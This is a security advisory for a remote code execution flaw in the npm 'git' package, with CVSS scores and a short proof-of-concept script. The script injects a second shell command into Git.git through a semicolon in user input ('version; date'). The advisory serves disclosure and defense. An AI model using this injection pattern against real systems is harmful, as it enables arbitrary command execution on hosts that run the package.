Remote Code Execution (RCE) Affecting git package, versions *


Severity

Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    EPSS
    0.96% (84th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-GIT-1568518
  • published 18 Oct 2021
  • disclosed 23 Aug 2021
  • credit Paul-Emmanuel Raoul of SkypLabs

How to fix?

There is no fixed version for git.

Overview

Affected versions of this package are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands.

Steps to Reproduce

  1. Create a file named exploit.js with the following content:

    var Git = require("git").Git;
    
    

    var repo = new Git("repo-test");

    var user_input = "version; date";

    repo.git(user_input, function(err, result) { console.log(result); })

  2. In the same directory as exploit.js, run npm install git.

  3. Run exploit.js: node exploit.js.

You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
6.6 medium
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    High
  • Privileges Required (PR)
    High
  • User Interaction (UI)
    None
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    High
  • Integrity (I)
    High
  • Availability (A)
    High
Expand this section

NVD

9.8 critical